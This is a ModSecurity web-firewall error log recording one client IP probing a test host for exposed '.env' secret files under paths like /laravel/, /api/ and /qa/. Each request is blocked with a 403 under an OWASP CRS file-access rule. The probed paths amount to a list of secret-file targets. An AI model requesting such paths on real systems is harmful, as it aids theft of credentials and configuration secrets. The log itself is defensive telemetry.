[Thu Jan 08 21:17:50.130649 2026] [:error] [pid 1270037] [client 18.119.100.98:52028] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.staging"] [unique_id "aWAQ7uA_IfWyU2EIiRhOhgAAAAI"]
[Thu Jan 08 21:17:50.130857 2026] [:error] [pid 1270037] [client 18.119.100.98:52028] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.staging"] [unique_id "aWAQ7uA_IfWyU2EIiRhOhgAAAAI"]
[Thu Jan 08 21:17:50.131014 2026] [:error] [pid 1270037] [client 18.119.100.98:52028] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.staging"] [unique_id "aWAQ7uA_IfWyU2EIiRhOhgAAAAI"]
[Thu Jan 08 21:17:50.478464 2026] [:error] [pid 1280390] [client 18.119.100.98:52134] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.local"] [unique_id "aWAQ7tKTJIy7S9W5nL2LQQAAAAk"]
[Thu Jan 08 21:17:50.478718 2026] [:error] [pid 1280390] [client 18.119.100.98:52134] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.local"] [unique_id "aWAQ7tKTJIy7S9W5nL2LQQAAAAk"]
[Thu Jan 08 21:17:50.478910 2026] [:error] [pid 1280390] [client 18.119.100.98:52134] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.local"] [unique_id "aWAQ7tKTJIy7S9W5nL2LQQAAAAk"]
[Thu Jan 08 21:17:50.824593 2026] [:error] [pid 1270038] [client 18.119.100.98:52248] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.production"] [unique_id "aWAQ7hmwMJtANIcuNUXpJgAAAAM"]
[Thu Jan 08 21:17:50.824811 2026] [:error] [pid 1270038] [client 18.119.100.98:52248] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.production"] [unique_id "aWAQ7hmwMJtANIcuNUXpJgAAAAM"]
[Thu Jan 08 21:17:50.824973 2026] [:error] [pid 1270038] [client 18.119.100.98:52248] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.production"] [unique_id "aWAQ7hmwMJtANIcuNUXpJgAAAAM"]
[Thu Jan 08 21:17:51.174091 2026] [:error] [pid 1270039] [client 18.119.100.98:52380] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.local"] [unique_id "aWAQ75ccQYhM1DUhi_W7CwAAAAQ"]
[Thu Jan 08 21:17:51.174312 2026] [:error] [pid 1270039] [client 18.119.100.98:52380] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.local"] [unique_id "aWAQ75ccQYhM1DUhi_W7CwAAAAQ"]
[Thu Jan 08 21:17:51.174536 2026] [:error] [pid 1270039] [client 18.119.100.98:52380] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.local"] [unique_id "aWAQ75ccQYhM1DUhi_W7CwAAAAQ"]
[Thu Jan 08 21:17:51.532419 2026] [:error] [pid 1270043] [client 18.119.100.98:52534] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env"] [unique_id "aWAQ7wvEr1EpOYnVfM6rxgAAAAc"]
[Thu Jan 08 21:17:51.532630 2026] [:error] [pid 1270043] [client 18.119.100.98:52534] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env"] [unique_id "aWAQ7wvEr1EpOYnVfM6rxgAAAAc"]
[Thu Jan 08 21:17:51.532779 2026] [:error] [pid 1270043] [client 18.119.100.98:52534] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env"] [unique_id "aWAQ7wvEr1EpOYnVfM6rxgAAAAc"]
[Thu Jan 08 21:17:51.876304 2026] [:error] [pid 1270035] [client 18.119.100.98:52698] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.production"] [unique_id "aWAQ7yYqm_i2BUcmtQb4uwAAAAA"]
[Thu Jan 08 21:17:51.876514 2026] [:error] [pid 1270035] [client 18.119.100.98:52698] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.production"] [unique_id "aWAQ7yYqm_i2BUcmtQb4uwAAAAA"]
[Thu Jan 08 21:17:51.876689 2026] [:error] [pid 1270035] [client 18.119.100.98:52698] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.production"] [unique_id "aWAQ7yYqm_i2BUcmtQb4uwAAAAA"]
[Thu Jan 08 21:17:52.222126 2026] [:error] [pid 1270041] [client 18.119.100.98:52842] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aWAQ8M3GwEx_BV8-CrWURwAAAAU"]
[Thu Jan 08 21:17:52.222394 2026] [:error] [pid 1270041] [client 18.119.100.98:52842] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aWAQ8M3GwEx_BV8-CrWURwAAAAU"]
[Thu Jan 08 21:17:52.222561 2026] [:error] [pid 1270041] [client 18.119.100.98:52842] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aWAQ8M3GwEx_BV8-CrWURwAAAAU"]
[Thu Jan 08 21:17:52.568459 2026] [:error] [pid 1270042] [client 18.119.100.98:52982] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.production"] [unique_id "aWAQ8C7RlX2cRjHcFz6xwwAAAAY"]
[Thu Jan 08 21:17:52.568670 2026] [:error] [pid 1270042] [client 18.119.100.98:52982] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.production"] [unique_id "aWAQ8C7RlX2cRjHcFz6xwwAAAAY"]
[Thu Jan 08 21:17:52.568827 2026] [:error] [pid 1270042] [client 18.119.100.98:52982] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.production"] [unique_id "aWAQ8C7RlX2cRjHcFz6xwwAAAAY"]
[Thu Jan 08 21:17:52.914796 2026] [:error] [pid 1283304] [client 18.119.100.98:53148] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.production"] [unique_id "aWAQ8GAwUIZgFNkik8yVPgAAAAg"]
[Thu Jan 08 21:17:52.915004 2026] [:error] [pid 1283304] [client 18.119.100.98:53148] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.production"] [unique_id "aWAQ8GAwUIZgFNkik8yVPgAAAAg"]
[Thu Jan 08 21:17:52.915168 2026] [:error] [pid 1283304] [client 18.119.100.98:53148] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.production"] [unique_id "aWAQ8GAwUIZgFNkik8yVPgAAAAg"]
[Thu Jan 08 21:17:53.266465 2026] [:error] [pid 1270036] [client 18.119.100.98:53298] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWAQ8eM1154Q6b0hewij5wAAAAE"]
[Thu Jan 08 21:17:53.266680 2026] [:error] [pid 1270036] [client 18.119.100.98:53298] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWAQ8eM1154Q6b0hewij5wAAAAE"]
[Thu Jan 08 21:17:53.266881 2026] [:error] [pid 1270036] [client 18.119.100.98:53298] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWAQ8eM1154Q6b0hewij5wAAAAE"]
[Thu Jan 08 21:17:53.613434 2026] [:error] [pid 1270037] [client 18.119.100.98:53460] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.staging"] [unique_id "aWAQ8eA_IfWyU2EIiRhOhwAAAAI"]
[Thu Jan 08 21:17:53.613660 2026] [:error] [pid 1270037] [client 18.119.100.98:53460] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.staging"] [unique_id "aWAQ8eA_IfWyU2EIiRhOhwAAAAI"]
[Thu Jan 08 21:17:53.614936 2026] [:error] [pid 1270037] [client 18.119.100.98:53460] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.staging"] [unique_id "aWAQ8eA_IfWyU2EIiRhOhwAAAAI"]
[Thu Jan 08 21:17:53.971529 2026] [:error] [pid 1280390] [client 18.119.100.98:53636] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.staging"] [unique_id "aWAQ8dKTJIy7S9W5nL2LQgAAAAk"]
[Thu Jan 08 21:17:53.971741 2026] [:error] [pid 1280390] [client 18.119.100.98:53636] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.staging"] [unique_id "aWAQ8dKTJIy7S9W5nL2LQgAAAAk"]
[Thu Jan 08 21:17:53.971894 2026] [:error] [pid 1280390] [client 18.119.100.98:53636] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.staging"] [unique_id "aWAQ8dKTJIy7S9W5nL2LQgAAAAk"]
[Thu Jan 08 21:17:54.314575 2026] [:error] [pid 1270038] [client 18.119.100.98:53818] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.local"] [unique_id "aWAQ8hmwMJtANIcuNUXpJwAAAAM"]
[Thu Jan 08 21:17:54.314808 2026] [:error] [pid 1270038] [client 18.119.100.98:53818] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.local"] [unique_id "aWAQ8hmwMJtANIcuNUXpJwAAAAM"]
[Thu Jan 08 21:17:54.314970 2026] [:error] [pid 1270038] [client 18.119.100.98:53818] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.local"] [unique_id "aWAQ8hmwMJtANIcuNUXpJwAAAAM"]
[Thu Jan 08 21:17:54.661014 2026] [:error] [pid 1270039] [client 18.119.100.98:54006] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.local"] [unique_id "aWAQ8pccQYhM1DUhi_W7DAAAAAQ"]
